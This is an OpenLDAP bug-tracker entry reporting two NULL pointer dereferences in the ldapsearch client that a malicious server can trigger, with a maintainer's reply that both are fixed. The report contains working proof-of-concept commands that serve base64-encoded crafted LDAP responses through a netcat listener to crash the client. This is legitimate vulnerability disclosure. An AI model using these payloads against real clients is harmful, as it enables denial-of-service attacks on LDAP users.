OpenLDAP
Up to top level
Build   Contrib   Development   Documentation   Historical   Incoming   Software Bugs   Software Enhancements   Web  

Logged in as guest

Viewing Software Bugs/8842
Full headers

From: openldap@katzen.cc
Subject: NULL pointer derefence
Compose comment
Download message
State:
0 replies:
1 followups: 1

Major security issue: yes  no

Notes:

Notification:


Date: Tue, 01 May 2018 20:14:50 +0000
From: openldap@katzen.cc
To: openldap-its@OpenLDAP.org
Subject: NULL pointer derefence
Full_Name: Catz Meow
Version: openldap-2.4.46
OS: Archlinux
URL: ftp://ftp.openldap.org/incoming/
Submission from: (NULL) (134.19.121.246)


2 small issues:
I'm keeping it brief, let me know if you need more information.

A malicious LDAP server or mitm attacker can craft a response that causes the
ldap client to crash. Nothing critical, just a simoke DoS.

echo "MAwCAQFhBwoBAAQABAAwNgIBAnkxBBFkYz1leGFtcGxlLGRjPWNvbQoBAgoBAAIBAAIBAAEBAIcL
b2JqZWN0Y2xhc3MwADCBiQIBAmSBgwQRZGM9ZXhhbXBsZSxkYz1jb20wbjAnBAtvYmplY3RDbGFz
czEYBAhkY09iamVjdAQMb3JnYW5pemF0aW9uMA8EAmRjMQkEB2V4YW1wbGUwDgQBbzEJBAdFeGFt
cGxlMCIEC2Rlc2NyaXB0aW9uMRMEEUV4YW1wbGUgZGlyZWN0b3J5MHkCAQJkdAQZY249cm9vdCxk
Yz1leGFtcGxlLGRjPWNvbTBXMCMEC29iamVjdENsYXNzMRQEEm9yZ2FuaXphdGlvbmFsUm9sZTAM
BAJjbjEGBARyb290MCIEC2Rlc2NyaXB0aW9uMRMEEURpcmVjdG9yeSBNYW5hZ2VyMIIBcAIBAmSC
AWkEGnVpZD1hZGFtLGRjPWV4YW1wbGUsZGM9Y29tMIIBSTA6BAtvYmplY3RDbGFzczErBAN0b3AE
B2FjY291bnQEDHBvc2l4QWNjb3VudAQNc2hhZG93QWNjb3VudDAMBAJjbjEGBARhZGFtMA0EA3Vp
ZDEGBARhZGFtMBQECXVpZE51bWJlcjEHBAUxNjg1OTASBAlnaWROdW1iZXIxBQQDMTAwMB0EDWhv
bWVEaXJlY3RvcnkxDAQKL2hvbWUvYWRhbTAZBApsb2dpblNoZWxsMQsECS9iaW4vYmFzaDAPBAVn
ZWNvczEGBARhZGFtMBcEEHNoYWRvd0xhc3RDaGFuZ2UxAwQBMDAQBAlzaGFkb3dNYXgxAwQBMDAU
BA1zaGFkb3dXYXJuaW5nMQMEATAwOAQMdXNlclBhc3N3b3JkMSgEJntTU0hBfXMzdWIwNnpCNVd2
UmVUZFZPOEVRelRMWVhvSFRCWGVNMAwCAQJlBwoBAAQABAA=" | base64 -d | nc -lvp 14222

./clients/tools/.libs/ldapsearch -D cn=root,dc=example,dc=com -b
dc=example,dc=com -h 127.0.0.1:14222 -x -w secret


Affected code:
./clients/tools/ldapsearch.c

static int dosearch(
[...]
 case LDAP_RES_INTERMEDIATE:
                                npartial++;
                                ldap_parse_intermediate( ld, msg,
                                        &retoid, &retdata, NULL, 0 );
                                nresponses_psearch = 0;
			if ( strcmp( retoid, LDAP_SYNC_INFO ) == 0 ) {

The problem here is that retoid can be NULL after ldap_parse_intermediate() is
called. 





Another NULL pointer dereference caused by a bad response:

echo "MAwCAQFhBwoBAAQABAAwgYkCAQJkgYMEEWRjPWV4YW1wbGUsZGM9AARtMG4wJwQLb2JqZWN0Q2xh
c3MxGAQIZGNPYmplY3QEDG9yZ2FuaXphdGlvbjAPBAJkYzEJBAdleGFtcGxlMA4EAW8xCQQHRXhh
bXBsZTAiBAtkZXNjcmlwdGlvbjETBBFFeGFtcGxlIGRpcmVjdG9yeTB5AgECZHQEGWNuPXJvb3Qs
ZGM9ZXhhbXBsZSxkYz1jb20wVzAjBAtvYmplY3RDbGFzczEUBBJvcmdhbml6YXRpb25hbFJvbGUw
DAQCY24xBgQEcm9vdDAiBAtkZXNjcmlwdGlvbjETBBFEaXJlY3RvcnkgTWFuYWdlcjCCAXACAQJk
ggFpBBp1aWQ9YWRhbSxkYz1leGFtcGxlLGRjPWNvbTCCAUkwOgQLb2JqZWN0Q2xhc3MxKwQDdG9w
BAdhY2NvdW50BAxwb3NpeEFjY291bnQEDXNoYWRvd0FjY291bnQwDAQCY24xBgQEYWRhbTANBAN1
aWQxBgQEYWRhbTAUBAl1aWROdW1iZXIxBwQFMTY4NTkwEgQJZ2lkTnVtYmVyMQUEAzEwMDAdBA1o
b21lRGlyZWN0b3J5MQwECi9ob21lL2FkYW0wGQQKbG9naW5TaGVsbDELBAkvYmluL2Jhc2gwDwQF
Z2Vjb3MxBgQEYWRhbTAXBBBzaGFkb3dMYXN0Q2hhbmdlMQMEATAwEAQJc2hhZG93TWF4MQMEATAw
FAQNc2hhZG93V2FybmluZzEDBAEwMDgEDHVzZXJQYXNzd29yZDEoBCZ7U1NIQX1zM3ViMDZ6QjVX
dlJlVGRWTzhFUXpUTFlYb0hUQlhlTTAMAgECZQcKAQAEAAQA" | base64 -d | nc -lvp 14222

./clients/tools/.libs/ldapsearch -D cn=root,dc=example,dc=com -b
dc=example,dc=com -h 127.0.0.1:14222 -x -w secret


The PoC leads to memcpy being called with a NULL pointer as second argument
(ava->la_value.bv_val) in dn2domain() (libraries/libldap/getdn.c):

AC_MEMCPY( str, ava->la_value.bv_val,  ava->la_value.bv_len + 1);





Followup 1

Download message
Date: Thu, 21 Jun 2018 17:29:24 +0200
From: =?utf-8?B?T25kxZllaiBLdXpuw61r?= <ondra@mistotebe.net>
To: openldap@katzen.cc
Cc: openldap-its@OpenLDAP.org
Subject: Re: (ITS#8842) NULL pointer derefence
On Tue, May 01, 2018 at 08:14:50PM +0000, openldap@katzen.cc wrote:
> 2 small issues:
> I'm keeping it brief, let me know if you need more information.
> 
> A malicious LDAP server or mitm attacker can craft a response that causes
the
> ldap client to crash. Nothing critical, just a simoke DoS.
> [...]
> The problem here is that retoid can be NULL after ldap_parse_intermediate()
is
> called. 
>
> Another NULL pointer dereference caused by a bad response:
> [...]
> The PoC leads to memcpy being called with a NULL pointer as second argument
> (ava->la_value.bv_val) in dn2domain() (libraries/libldap/getdn.c):
> 
> AC_MEMCPY( str, ava->la_value.bv_val,  ava->la_value.bv_len + 1);

Both are fixed in this branch:
https://github.com/mistotebe/openldap/tree/its8842

-- 
Ond..ej Kuzn..k
Senior Software Engineer
Symas Corporation                       http://www.symas.com
Packaged, certified, and supported LDAP solutions powered by OpenLDAP


Up to top level
Build   Contrib   Development   Documentation   Historical   Incoming   Software Bugs   Software Enhancements   Web  

Logged in as guest


The OpenLDAP Issue Tracking System uses a hacked version of JitterBug

______________
© Copyright 2013, OpenLDAP Foundation, info@OpenLDAP.org